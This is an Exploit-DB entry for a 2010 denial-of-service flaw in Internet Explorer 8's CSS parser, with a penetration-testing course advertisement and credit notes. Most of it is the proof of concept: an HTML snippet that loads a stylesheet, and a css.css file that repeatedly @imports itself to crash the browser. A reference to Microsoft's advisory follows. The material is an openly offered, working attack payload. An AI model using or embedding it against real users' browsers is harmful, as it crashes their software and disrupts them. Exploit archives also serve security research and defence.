Microsoft Internet Explorer 8 - CSS Parser Denial of Service

EDB-ID:

15708


Author:

WooYun

Type:

dos


Platform:

Windows

Date:

2010-12-08


Become a Certified Penetration Tester

Enroll in Penetration Testing with Kali Linux , the course required to become an Offensive Security Certified Professional (OSCP)

GET CERTIFIED

<code>
<div style="position: absolute; top: -999px;left: -999px;">
<link href="css.css" rel="stylesheet" type="text/css" />
</code>

<code of css.css>
*{
 color:red;
}
@import url("css.css");
@import url("css.css");
@import url("css.css");
@import url("css.css");
</code>


Exploit-DB Notes:
* Original credit goes to an unidentified researcher using WooYun anonymous account "路人甲".
WooYun is a connection platform for vendors and security researchers:
http://www.wooyun.org/bugs/wooyun-2010-0885

* Dec 22, 2010 - Microsoft releases security advisory for this vulnerability:
http://www.microsoft.com/technet/security/advisory/2488013.mspx